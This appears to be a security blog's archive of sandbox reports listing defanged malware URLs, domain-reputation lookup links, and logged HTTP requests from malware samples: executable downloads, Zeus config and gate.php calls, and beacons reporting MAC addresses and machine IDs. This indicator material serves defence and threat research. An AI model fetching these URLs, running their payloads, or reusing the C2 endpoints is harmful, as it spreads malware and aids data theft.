Tag Archives: dangerous urls

Recent Malware URLs captured by NoVirusThanks Sandbox

These URLs are malicious or related to malware:

hxxp://caperiod.com/pxxko/ndrei.php?adv=adv401&id=1626783411&c=203332757
hxxp://caperiod.com/pxxko/wjwjwaobfs.php?adv=adv401&id=1626783411&c=203332757
hxxp://getpersgd09.com/persgd09/setup.php?track_id=30046
hxxp://gopersgd09.com/install/?track_id=30046
hxxp://carefinder.com.au/inf.php
hxxp://scr4zy.webcindario.com/2/infects.php
hxxp://elmejorbonche.com/dns
hxxp://photopath.in/8797hkj9jk9j778kj9h78k9jh.php?ini=v22MnDTkT9enCDVl61YdHLJrOeDmJ4Q6O41eH
hxxp://www.easyenco.co.kr/module/program/media_codec.exe
hxxp://www.easyenco.co.kr/module/count.asp?exec=media_codec.exe
hxxp://www.easyenco.co.kr/module/count_live.asp?exec=media_codec.exe
hxxp://c0re.su/panel/config.bin
hxxp://ck4.nucleardiscover.com:88/p6.asp?MAC=%MAC%&Publicer=100
hxxp://201.25.28.9/mail/images/info.php
hxxp://startfaredata.in/o54p6ipo546ipo6.php?ini=v22MnDTkT9enCDVl61YdHLJrOeDmJ4Q6O41eH
hxxp://tecnp.h19.ru/in.php
hxxp://www.cplnn.com/bbcount.php?action=knock&build=sp1
hxxp://www.cplnn.com/wad/init3.php?build=
hxxp://mmm-2011.co.uk/setup2683.exe
hxxp://mmm-2011.co.uk/ka.exe
hxxp://cekcuc.ru/z/kilka.bin
hxxp://up1.free-sms.co.kr/main/free07/smsupsetting.dat
hxxp://up1.free-sms.co.kr/main/free07/smsins.exe
hxxp://up1.free-sms.co.kr/main/free07/smsdat.dat
hxxp://up1.free-sms.co.kr/upapp/free07/eventex.exe
hxxp://free-sms.co.kr/app_count/install_count.php?&pid=free07&mac=%MAC%
hxxp://up1.free-sms.co.kr/main/free07/free-sms.exe
hxxp://up1.free-sms.co.kr/main/free07/uninst.exe
hxxp://up1.free-sms.co.kr/main/free07/free-sms.ico
hxxp://up1.free-sms.co.kr/main/free07/smsupv.exe
hxxp://ppppnipponp.r7m.us/cgi-bin/p.cgi
hxxp://flashpile.in/90ds8c9ds8c9d0s8cds.php?ini=v22MnDTkT9enCDVl61YdHLJrOeDmJ4Q6O41eHy
hxxp://neframeofwork.com/gud/hig.op
hxxp://ad.ring3.info/Config.asp
hxxp://ad.ring3.info/Count/Count.asp
hxxp://www.bbsv.nl/files/cache/.../contador.php
hxxp://firstresour.web135.discountasp.net/.sys.php?action=fbgen&v=1
hxxp://shellybeachskiboatclub.co.za/.sys.php?action=fbgen&v=1
hxxp://shellybeachskiboatclub.co.za/.sys.php?action=aolsbm&v=1&hardid=%HDID%&id=0
hxxp://blognote.by/f/fn.txt
hxxp://www.caesar.sk/downloads/getc/getc.php
hxxp://114.200.199.251/apsuy.php
hxxp://iring4u.co.kr/bcklist.php
hxxp://ad79.co.kr/prex/newb/apsuo.exe
hxxp://114.200.199.251/b5ains.php?mac=%MAC%&ip=%LANIP%&pid=&setup=1
hxxp://114.200.199.251/b5aliveins.php?mac=%MAC%&ip=%LANIP%&pid=&app=
hxxp://caperiod.com/pxxko/iwwnnrvi.php?adv=adv401&id=1626783411&c=203332757
hxxp://caperiod.com/pxxko/klppp.php?adv=adv401&id=1626783411&c=203332757
hxxp://caperiod.com/pxxko/sftkxkb.php?adv=adv401&id=1626783411&c=203332757
hxxp://caperiod.com/pxxko/cpptuxlpc.php?adv=adv401&id=1626783411&c=203332757
hxxp://caperiod.com/pxxko/oyppct.php?adv=adv401&id=1626783411&c=203332757
hxxp://caperiod.com/pxxko/obcptx.php?adv=adv401&id=1626783411&c=203332757
hxxp://gamafotolembranca.com.br/masters/byte.gif
hxxp://gamafotolembranca.com.br/masters/mega.gif
hxxp://gamafotolembranca.com.br/masters/tera.gif
hxxp://www.basedeclientes.com.br/versao_px.txt
hxxp://myck.nucleardiscover.com:88/p6.asp?MAC=%MAC%&Publicer=100
hxxp://celinhaz.sites.uol.com.br/autor2.jpg
hxxp://www.avisosbaladabelemhh.com.br/files/j1/inf/arq.php
hxxp://caperiod.com/pxxko/xxobo.php?adv=adv401&id=1626783411&c=203332757
hxxp://caperiod.com/pxxko/pcppgk.php?adv=adv401&id=1626783411&c=203332757
hxxp://webmail.imicro.com.br/SQL/cashkey.gif
hxxp://searcham.org/404.php?type=stats&affid=527&subid=02&iruns
hxxp://w.nucleardiscover.com:888/list.php?c=B4AC885F94224AE64DAAC6EE0346C213D049B58E0B&v=2&t=0,5870172
hxxp://ru.coolnuff.com:2011/myck.jpg?t=0,1209528
hxxp://w.nucleardiscover.com:888/sn.php?c=C1DF13F78111F6528E63540E077DCF0C0&t=0,8235895
hxxp://w.nucleardiscover.com:888/sn.php?c=4D535BBF44D4BC186F82F8A2A1DB468528B&t=0,2664606
hxxp://58.150.174.222/baz001.jpg?t=0,4474756
hxxp://w.nucleardiscover.com:888/sn.php?c=B9A76E8AC252E133E3FEAAF11C54E417E770B&t=0,1963922
hxxp://w.nucleardiscover.com:888/sn.php?c=9D83997D1A8A28FA809D6239A9E1FF0CAB3C0&t=0,1260797
hxxp://searchattention.org/404.php?type=stats&affid=531&subid=01&iruns
hxxp://www.easyenco.co.kr/module/program/nvsvc32.exe
hxxp://www.easyenco.co.kr/module/count.asp?exec=nvsvc32.exe
hxxp://www.easyenco.co.kr/module/count_live.asp?exec=nvsvc32.exe
hxxp://caperiod.com/pxxko/jjnaeei.php?adv=adv401&id=1626783411&c=203332757
hxxp://caperiod.com/pxxko/gqquulypp.php?adv=adv401&id=1626783411&c=203332757
hxxp://caperiod.com/pxxko/gggklycc.php?adv=adv401&code1=JNN0&code2=5103
hxxp://www.ilonexs.de/envio/gds32.dll
hxxp://www.familiennavigator.de/components/com_kunena/template/igt.php
hxxp://qd6170.91mt.com/asp/xg.asp
hxxp://qd6170.91mt.com/exe/key2/key_0605.exe
hxxp://key.91mt.com/newkey.php
hxxp://rh508.91mt.com/tj.asp?id=1
hxxp://ups.1gb.ru/services6.exe
hxxp://ekobit.com.pl/cls/Output.exe
hxxp://xn.bisque110.com/yt.php
hxxp://xn.bisque110.com/lf
hxxp://122.770304123.cn/1.gif
hxxp://122.770304123.cn/ue000/38sw.e?uid=162678341112952317322438
hxxp://110.770304123.cn/1.gif
hxxp://110.770304123.cn/player/blog.updata?v=1.1.8.1&r1=0009a83babc21d46591d009e616da91a&tm=2011-06-12%2003:55:28&os=Windows%20XP.2600%20with%20Service%20Pack%202&uid=002678341112952317328300&cht=0
hxxp://caperiod.com/pxxko/gggklycc.php?adv=adv401&code1=GO00&code2=0200&id=102678
hxxp://coursu.com/admin22/server[php]/config.bin
hxxp://ad79.co.kr/fie/sningal.exe
hxxp://114.200.199.251/fie/statins.php?mac=%MAC%&compare=%MAC%&ip=%LANIP%&pid=&install=1
hxxp://114.200.199.251/fie/liveins.php?mac=%MAC%&ip=%LANIP%&pid=
hxxp://iring4u.co.kr/favorbutton.php
hxxp://face-herault.org/images/ads/info.php
hxxp://lkrgn.ivepointedya.com/webyx/settings.cfg?build=501&os=XP
hxxp://network.emloud.com/webyx/iLog.php?dl=5.0&log=Loader%205.0%20~%20Ran
hxxp://consolewaspogad.com/czl/zlo.cl
hxxp://icvaircl.cn/dll/44.dll
hxxp://icvaircl.cn/stat.php?w=44&i=a7157a4db6097a4d51eacb5987fd206c&a=2
hxxp://icvaircl.cn/update.db
hxxp://icvaircl.cn/stat.php?w=44&i=a7157a4db6097a4d51eacb5987fd206c&a=4
hxxp://icvaircl.cn/stat.php?w=44&i=a7157a4db6097a4d51eacb5987fd206c&a=9
hxxp://icvaircl.cn/stat.php?w=44&i=a7157a4db6097a4d51eacb5987fd206c&a=11
hxxp://xylahavowi.com/1023000112
hxxp://caperiod.com/pxxko/gggklycc.php?adv=adv401&code1=JOM0&code2=4203
hxxp://jennifermusic.nl/logo2.jpg
hxxp://caperiod.com/pxxko/gggklycc.php?adv=adv401&code1=JOP0&code2=7203
hxxp://fastsearchportal.org/cfg/miniav.psd
hxxp://fastsearchportal.org/cfg/stopav.psd
hxxp://fastsearchportal.org/cfg/passw.psd
hxxp://fastsearchportal.org/pyvcu.php3
hxxp://fastsearchportal.org/ungtsmsuopstfsjjxaqhpksdi.phtml
hxxp://fastsearchportal.org/mccmkbawzojuijhsyttn.inc
hxxp://fastsearchportal.org/onqyofrbc.phtm
hxxp://myavava.in/90ds8c9ds8c9d0s8cds.php?ini=v22MnDTkT9enCDVl61YdHLJrOeDmJ4Q6O41eHyF2e
hxxp://clashjamwallop.in/90ds8c9ds8c9d0s8cds.php?ini=v22MnDTkT9enCDVl61YdHLJrO
hxxp://adordota.com/bandwidth.bin
hxxp://einemenge.info/webpanel/alive.php?key=grills22&pcuser=%PCUSER%&pcname=%PCNAME%&hwid=%HWID%&country=Italy
hxxp://caperiod.com/pxxko/gggklycc.php?adv=adv401&code1=KOR0&code2=9204
hxxp://JOSEMORAISTA.net/Machine.jpg
hxxp://JOSEMORAISTA.net/andeikyu.jpg
hxxp://mariadacoceicaopraxedes.net/GetString.aspx
hxxp://mariadacoceicaopraxedes.net/Query.aspx
hxxp://98.158.182.229/~milhomem/ver.txt?20110612045029
hxxp://mariadacoceicaopraxedes.net/COMCTL32.OCA.zip
hxxp://s350098374.onlinehome.us/mys.ini
hxxp://rmhpzusmfhtpnt.biz/news/?s=167674
hxxp://axvkxnuutylqdtu.com/news/?s=90742
hxxp://outoszjfvqtyonk.net/news/?s=24872
hxxp://114.200.199.251/vanir.php
hxxp://114.200.199.251/b7ins.php?mac=%MAC%&ip=%LANIP%&pid=vanir&setup=1
hxxp://114.200.199.251/b7liveins.php?mac=%MAC%&ip=%LANIP%&pid=vanir&app=
hxxp://privatesystem-softshieldprotect.com/favicon.ico?0=78&1=4&2=2&3=80&4=i-s
hxxp://212.150.164.204/flash/flashplayer.jpg
hxxp://www.increasingly.kr/Module/gomserv.exe
hxxp://www.increasingly.kr/Module/count.html?exec=gomserv.exe&instFile=gomserv.exe
hxxp://www.increasingly.kr/Module/count_live.html?exec=gomserv.exe
hxxp://windoslive.hotmail.ru/090043043543034877799.exe
hxxp://searchbehind.org/404.php?type=stats&affid=531&subid=03&iruns
hxxp://mygateforex.co.za/.sys.php?action=fbgen&v=1
hxxp://richardwiggers.com/.sys.php?action=fbgen&v=1
hxxp://www.obi-labs.com/.sys.php?action=fbgen&v=1
hxxp://www.obi-labs.com/.sys.php?action=tumgen&mode=gen&v=1&hardid=%HDID%&email=&cnt=0
hxxp://rvl.it/.sys.php?action=fbgen&v=1
hxxp://www.irishpub.fo/.sys.php?action=fbgen&v=1
hxxp://lets-exoticpets.co.za/.sys.php?action=fbgen&v=1
hxxp://lets-exoticpets.co.za/.sys.php?action=tumgen&mode=gen&v=1&hardid=%HDID%&email=&cnt=1
hxxp://slcsc.co.uk/.sys.php?action=fbgen&v=1
hxxp://voodoobarbcue.com/.sys.php?action=fbgen&v=1
hxxp://voodoobarbcue.com/.sys.php?action=tumgen&mode=gen&v=1&hardid=%HDID%&email=&cnt=2
hxxp://robertjakobsen.com/.sys.php?action=fbgen&v=1
hxxp://crosslinkhk.com/.sys.php?action=fbgen&v=1
hxxp://skybluephoto.com/.sys.php?action=fbgen&v=1
hxxp://3mates.com/.sys.php?action=fbgen&v=1
hxxp://3mates.com/.sys.php?action=tumgen&mode=gen&v=1&hardid=%HDID%&email=&cnt=3
hxxp://www.crabapplesound.com/.sys.php?action=fbgen&v=1
hxxp://www.crabapplesound.com/.sys.php?action=tumgen&mode=gen&v=1&hardid=%HDID%&email=&cnt=4
hxxp://kidnet.co.il/.sys.php?action=fbgen&v=1
hxxp://gulko.co.za/.sys.php?action=fbgen&v=1
hxxp://shieldteens.co.za/.sys.php?action=fbgen&v=1
hxxp://wcw.co.za/.sys.php?action=fbgen&v=1
hxxp://wcw.co.za/.sys.php?action=tumgen&mode=gen&v=1&hardid=%HDID%&email=&cnt=5
hxxp://pflco.com/.sys.php?action=fbgen&v=1
hxxp://pflco.com/.sys.php?action=tumgen&mode=gen&v=1&hardid=%HDID%&email=&cnt=6
hxxp://my-mobility.co.za/.sys.php?action=fbgen&v=1
hxxp://wcw.co.za/.sys.php?action=tumgen&mode=gen&v=1&hardid=%HDID%&email=&cnt=7
hxxp://emergencyshelter.us/.sys.php?action=fbgen&v=1
hxxp://emergencyshelter.us/.sys.php?action=tumgen&mode=gen&v=1&hardid=%HDID%&email=&cnt=8
hxxp://www.aandedoorns.co.za/.sys.php?action=fbgen&v=1
hxxp://ad79.co.kr/prex/taurus/taurus.exe
hxxp://ad79.co.kr/dico/sDico.exe
hxxp://ad79.co.kr/prex/taurus/staurus.exe
hxxp://114.200.199.251/version2.php
hxxp://114.200.199.251/statins.php?mac=%MAC%&compare=%MAC%&ip=%LANIP%&pid=taurus&install=1
hxxp://iring4u.co.kr/dico/dico.php
hxxp://iring4u.co.kr/dico/statins.php?mac=%MAC%&compare=%MAC%&ip=%LANIP%&pid=&install=1
hxxp://114.200.199.251/liveins.php?mac=%MAC%&ip=%LANIP%&pid=taurus
hxxp://iring4u.co.kr/dico/liveins.php?mac=%MAC%&ip=%LANIP%&pid=
hxxp://pc-guarrantor-utility.com/favicon.ico?0=80&1660=0&2=1&3000=82&4000=i-s
hxxp://key.91mt.com/diykey.php
hxxp://limpidoscomercio.com.br/GetString.aspx
hxxp://limpidoscomercio.com.br/Query.aspx
hxxp://98.158.182.229/~milhomem/ver.txt?20110612141104
hxxp://limpidoscomercio.com.br/COMCTL32.OCA.zip
hxxp://limpidoscomercio.com.br/COMCTL32.OCX.zip
hxxp://petchaburi.kr/kwd/hkwd.php
hxxp://petchaburi.kr/kwd/dkwd.php
hxxp://petchaburi.kr/check/check.php?m=b
hxxp://64.31.58.237/brn.txt
hxxp://64.31.58.237/brn.php
hxxp://key.91mt.com/list/getpmnum.asp?id=f9435d25636a746f
hxxp://key.91mt.com/list/getpmnum2.asp?id=f9435d25636a746f
hxxp://114.200.199.251/ngliveins.php?pmac=0&lmac=%MAC%&ip=%LANIP%&pid=taurus
hxxp://www.hyap98.com/123/mh.txt
hxxp://www.hyap98.com/123/rx.txt
hxxp://www.hyap98.com/123/wc.txt
hxxp://www.hyap98.com/123/wm.txt
hxxp://www.hyap98.com/123/wow.txt
hxxp://w.nucleardiscover.com:888/sn.php?c=DCC228CCD04021858368C8936B1023D74A8&t=9,005374E-02
hxxp://w.nucleardiscover.com:888/sn.php?c=18064AAE3FAF34908C67CC976A11E317&t=0,3627588
hxxp://searcham.org/404.php?type=stats&affid=531&subid=03&iruns
hxxp://s350098374.onlinehome.us/update.php
hxxp://key.91mt.com/list/getpmnum.asp?id=e69ec59abbe3c794
hxxp://key.91mt.com/list/getpmnum2.asp?id=e69ec59abbe3c794
hxxp://key.91mt.com/list/clickpm.asp?id=e69ec59abbe3c794
hxxp://key.91mt.com/list/getpmnum.asp?id=fa67a8111002230d
hxxp://key.91mt.com/list/getpmnum2.asp?id=fa67a8111002230d
hxxp://98.158.182.229/~milhomem/ver.txt?20110612154053
hxxp://ck3.nucleardiscover.com:88/p6.asp?MAC=%MAC%&Publicer=100
hxxp://w.nucleardiscover.com:888/sn.php?c=948A7D999D0D9733C5285903F882FB388219AB9DA&t=0,894787
hxxp://w.nucleardiscover.com:888/sn.php?c=E1FF76924BDB00A47B96A8F2F18B995A4AD1A593F&t=0,5531122
hxxp://58.150.174.222/baz001.jpg?t=0,8852045
hxxp://131207db062d.dynazzy.net/get2.php?c=TCBIJIJK&d=26606B67393437333F2F676268307D3F22202323
hxxp://w.nucleardiscover.com:888/sn.php?c=4E5018FC71E12DFFD2CFCA91DB93&t=0,2665522
hxxp://w.nucleardiscover.com:888/sn.php?c=1F01DE3AC95905D70C11B&t=0,5650751
hxxp://ru.coolnuff.com:2011/ck3.jpg?t=0,4463007
hxxp://w.nucleardiscover.com:888/sn.php?c=3B25E90DC1513CEEB45CC6EB96EEC230&t=0,7814447
hxxp://w.nucleardiscover.com:888/sn.php?c=918FA94D78E873A13CD4E5C8502&t=0,8195307
hxxp://ru.coolnuff.com:2011/ck4.jpg?t=0,3862421
hxxp://w.nucleardiscover.com:888/sn.php?c=F8E65FBB45D53793A54EFCA7C5BEEB&t=0,3606684
hxxp://xylahavowi.com/1023000112
hxxp://tekefihamib.com/10230001124255461742
hxxp://tekefihamib.com/buy.html

URLVoid domain analysis:

http://www.urlvoid.com/scan/caperiod.com
http://www.urlvoid.com/scan/getpersgd09.com
http://www.urlvoid.com/scan/gopersgd09.com
http://www.urlvoid.com/scan/carefinder.com.au
http://www.urlvoid.com/scan/scr4zy.webcindario.com
http://www.urlvoid.com/scan/elmejorbonche.com
http://www.urlvoid.com/scan/photopath.in
http://www.urlvoid.com/scan/easyenco.co.kr
http://www.urlvoid.com/scan/c0re.su
http://www.urlvoid.com/scan/ck4.nucleardiscover.com
http://www.urlvoid.com/scan/201.25.28.9
http://www.urlvoid.com/scan/startfaredata.in
http://www.urlvoid.com/scan/tecnp.h19.ru
http://www.urlvoid.com/scan/cplnn.com
http://www.urlvoid.com/scan/mmm-2011.co.uk
http://www.urlvoid.com/scan/cekcuc.ru
http://www.urlvoid.com/scan/up1.free-sms.co.kr
http://www.urlvoid.com/scan/free-sms.co.kr
http://www.urlvoid.com/scan/ppppnipponp.r7m.us
http://www.urlvoid.com/scan/flashpile.in
http://www.urlvoid.com/scan/neframeofwork.com
http://www.urlvoid.com/scan/ad.ring3.info
http://www.urlvoid.com/scan/bbsv.nl
http://www.urlvoid.com/scan/firstresour.web135.discountasp.net
http://www.urlvoid.com/scan/shellybeachskiboatclub.co.za
http://www.urlvoid.com/scan/blognote.by
http://www.urlvoid.com/scan/caesar.sk
http://www.ipvoid.com/scan/114.200.199.251
http://www.urlvoid.com/scan/iring4u.co.kr
http://www.urlvoid.com/scan/ad79.co.kr
http://www.urlvoid.com/scan/gamafotolembranca.com.br
http://www.urlvoid.com/scan/basedeclientes.com.br
http://www.urlvoid.com/scan/myck.nucleardiscover.com
http://www.urlvoid.com/scan/celinhaz.sites.uol.com.br
http://www.urlvoid.com/scan/avisosbaladabelemhh.com.br
http://www.urlvoid.com/scan/webmail.imicro.com.br
http://www.urlvoid.com/scan/searcham.org
http://www.urlvoid.com/scan/w.nucleardiscover.com
http://www.urlvoid.com/scan/ru.coolnuff.com
http://www.ipvoid.com/scan/58.150.174.222
http://www.urlvoid.com/scan/searchattention.org
http://www.urlvoid.com/scan/ilonexs.de
http://www.urlvoid.com/scan/familiennavigator.de
http://www.urlvoid.com/scan/qd6170.91mt.com
http://www.urlvoid.com/scan/key.91mt.com
http://www.urlvoid.com/scan/rh508.91mt.com
http://www.urlvoid.com/scan/ups.1gb.ru
http://www.urlvoid.com/scan/ekobit.com.pl
http://www.urlvoid.com/scan/xn.bisque110.com
http://www.urlvoid.com/scan/122.770304123.cn
http://www.urlvoid.com/scan/110.770304123.cn
http://www.urlvoid.com/scan/coursu.com
http://www.urlvoid.com/scan/face-herault.org
http://www.urlvoid.com/scan/lkrgn.ivepointedya.com
http://www.urlvoid.com/scan/network.emloud.com
http://www.urlvoid.com/scan/consolewaspogad.com
http://www.urlvoid.com/scan/icvaircl.cn
http://www.urlvoid.com/scan/xylahavowi.com
http://www.urlvoid.com/scan/jennifermusic.nl
http://www.urlvoid.com/scan/fastsearchportal.org
http://www.urlvoid.com/scan/myavava.in
http://www.urlvoid.com/scan/clashjamwallop.in
http://www.urlvoid.com/scan/adordota.com
http://www.urlvoid.com/scan/einemenge.info
http://www.urlvoid.com/scan/JOSEMORAISTA.net
http://www.urlvoid.com/scan/mariadacoceicaopraxedes.net
http://www.ipvoid.com/scan/98.158.182.229
http://www.urlvoid.com/scan/s350098374.onlinehome.us
http://www.urlvoid.com/scan/rmhpzusmfhtpnt.biz
http://www.urlvoid.com/scan/axvkxnuutylqdtu.com
http://www.urlvoid.com/scan/outoszjfvqtyonk.net
http://www.urlvoid.com/scan/privatesystem-softshieldprotect.com
http://www.ipvoid.com/scan/212.150.164.204
http://www.urlvoid.com/scan/increasingly.kr
http://www.urlvoid.com/scan/windoslive.hotmail.ru
http://www.urlvoid.com/scan/searchbehind.org
http://www.urlvoid.com/scan/mygateforex.co.za
http://www.urlvoid.com/scan/richardwiggers.com
http://www.urlvoid.com/scan/obi-labs.com
http://www.urlvoid.com/scan/rvl.it
http://www.urlvoid.com/scan/irishpub.fo
http://www.urlvoid.com/scan/lets-exoticpets.co.za
http://www.urlvoid.com/scan/slcsc.co.uk
http://www.urlvoid.com/scan/voodoobarbcue.com
http://www.urlvoid.com/scan/robertjakobsen.com
http://www.urlvoid.com/scan/crosslinkhk.com
http://www.urlvoid.com/scan/skybluephoto.com
http://www.urlvoid.com/scan/3mates.com
http://www.urlvoid.com/scan/crabapplesound.com
http://www.urlvoid.com/scan/kidnet.co.il
http://www.urlvoid.com/scan/gulko.co.za
http://www.urlvoid.com/scan/shieldteens.co.za
http://www.urlvoid.com/scan/wcw.co.za
http://www.urlvoid.com/scan/pflco.com
http://www.urlvoid.com/scan/my-mobility.co.za
http://www.urlvoid.com/scan/emergencyshelter.us
http://www.urlvoid.com/scan/aandedoorns.co.za
http://www.ipvoid.com/scan/114.200.199.251
http://www.urlvoid.com/scan/pc-guarrantor-utility.com
http://www.urlvoid.com/scan/limpidoscomercio.com.br
http://www.urlvoid.com/scan/petchaburi.kr
http://www.ipvoid.com/scan/64.31.58.237
http://www.urlvoid.com/scan/hyap98.com
http://www.urlvoid.com/scan/ck3.nucleardiscover.com
http://www.urlvoid.com/scan/131207db062d.dynazzy.net
http://www.urlvoid.com/scan/tekefihamib.com

Recent malicious URLs analyzed #3

Report containing malicious urls logged:

POST /kj97hk9878b8j9hb.php?ini=XXX HTTP/1.1
User-Agent: Mozilla/6.0 (Windows; wget 3.0)
Host: simplycomics. in
 
POST /logos/XXX/61e3a327d/logo.gif HTTP/1.1
User-Agent: Mozilla/6.0 (Windows; wget 3.0)
Host: greatwebdata. in
 
POST /werber/b10353d72/217.gif HTTP/1.1
User-Agent: Mozilla/6.0 (Windows; wget 3.0)
Host: droolbuy. in
 
POST /perce/XXX/21c383b7c/qwerce.gif HTTP/1.1
User-Agent: Mozilla/6.0 (Windows; wget 3.0)
Host: migented. in
 
POST /college_news/college_news/college_news/college_news/build.php HTTP/1.0
User-Agent: Mozilla/3.0 (compatible; Indy Library)
Host: www.cnscut. cn
 
GET /zeus/zeus/config.bin HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 91.206.200.242
 
GET /help.txt HTTP/1.1
User-Agent: Mozilla/3.0 (compatible; Indy Library)
Host: www.cnscut. cn
 
GET /images/Telegrama.exe HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 80.13.172.136
 
GET /gx/444.txt HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: toxtb. info
 
GET /xztj/555.txt HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rvvxe. info
 
GET /xztj1/888.txt HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: qvnok. info
 
GET /gx2/333.txt HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: ucfya. info
 
POST /zeus/zeus/server%5bphp%5d/gate.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 91.206.200.242
 
GET /1/210.exe HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.nxmtv. info
 
GET /v14/setup.php?act=fb_get HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: ddk100. com
 
GET /1015000813 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: susimumezez. com
 
GET /v14/setup.php?act=fb_start&id=XXX HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: ddk100. com
 
GET /1/210.exe HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: udjng. info
 
GET /v14/setup.php?act=fb_get HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: ddk100. com
 
GET /xztj/555.txt HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rvvxe. info
 
POST /1wave.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: hawfruit. com
 
GET /2wave.php?Yfe6r8E2QkJI0l5aLw0nFAqjiyWNidTqKNSAKIduCPnN2WO7JO4xDtdtjJndzsJ2hg== HTTP/1.0
Referer: hxxp://tubefaster. com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: mattfoy. com
 
POST /1wave.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: hslibrary. com
 
GET /2wave.php?Yfe6r8M2QkJI0l5aLwkkExXuhTmDw4fxMdTKZ54jDfbUwHqhI/MuDdF/zZvXnLZr HTTP/1.0
Referer: hxxp://ad.adserverplus. com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: utling. com
 
POST /1wave.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: topsaj. com
 
GET /2wave.php?Yfe6r8U2QkJI0l5aLw0mEQKjiyWNidTqKNSAKIduCPnN2WO7JO4xDtdtjJndzsJ2hg== HTTP/1.0
Referer: http://trailersandvideos. com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: thevehic. com
 
GET /xztj1/888.txt HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: qvnok. info
 
GET /in.cgi?groups HTTP/1.0
Referer: hxxp://sl.servednetworks. com/www/delivery/afr.php?zoneid=57&cb=INSERT_RANDOM_NUMBER_HERE
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: m28m. in
 
GET /2wave.php?Yfe6r8k2QkJI0l5aLQwvHBXuhTmDw4fxMdTKZ54jDfbUwHqhI/MuDdF/zZvXnLZr HTTP/1.0
Referer: hxxp://www.investopedia. com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: thevehic. com

URLVoid domain analysis:

http://www.urlvoid.com/scan/simplycomics.in
http://www.urlvoid.com/scan/greatwebdata.in
http://www.urlvoid.com/scan/droolbuy.in
http://www.urlvoid.com/scan/migented.in
http://www.urlvoid.com/scan/cnscut.cn
http://www.ipvoid.com/scan/91.206.200.242
http://www.ipvoid.com/scan/80.13.172.136
http://www.urlvoid.com/scan/toxtb.info
http://www.urlvoid.com/scan/rvvxe.info
http://www.urlvoid.com/scan/qvnok.info
http://www.urlvoid.com/scan/ucfya.info
http://www.urlvoid.com/scan/nxmtv.info
http://www.urlvoid.com/scan/ddk100.com
http://www.urlvoid.com/scan/susimumezez.com
http://www.urlvoid.com/scan/udjng.info
http://www.urlvoid.com/scan/hawfruit.com
http://www.urlvoid.com/scan/mattfoy.com
http://www.urlvoid.com/scan/hslibrary.com
http://www.urlvoid.com/scan/utling.com
http://www.urlvoid.com/scan/topsaj.com
http://www.urlvoid.com/scan/thevehic.com
http://www.urlvoid.com/scan/qvnok.info
http://www.urlvoid.com/scan/m28m.in
http://www.urlvoid.com/scan/thevehic.com

Recent malicious URLs analyzed #2

Report containing malicious urls logged:

POST /msql.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Host: www.adamplus. com
 
GET /coldman.bin HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.lostyear. ru
 
GET /czl/zlo.cl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: casualhopperois. com
 
POST /zumboo.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.lameedge. ru
 
GET /files/454483969/usb.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rapidshare. com
 
GET /files/454483969/usb.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rs851tl2.rapidshare. com
 
GET /exe/4910b18a623c549e2e1bc53f6cc0682a4579fbf6/setup.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: get.zdropp.co. cc
 
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: image4msn. com
 
GET /install.48208.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: efirst-data. in
 
POST /djcash.php?ini=XXX HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: talkwire. in
 
GET /download.php?token=4910b18a623c549e2e1bc53f6cc0682a4579fbf6 HTTP/1.0
User-Agent: NSIS_Inetc (Mozilla)
Host: 5630.zdropp.co. cc
 
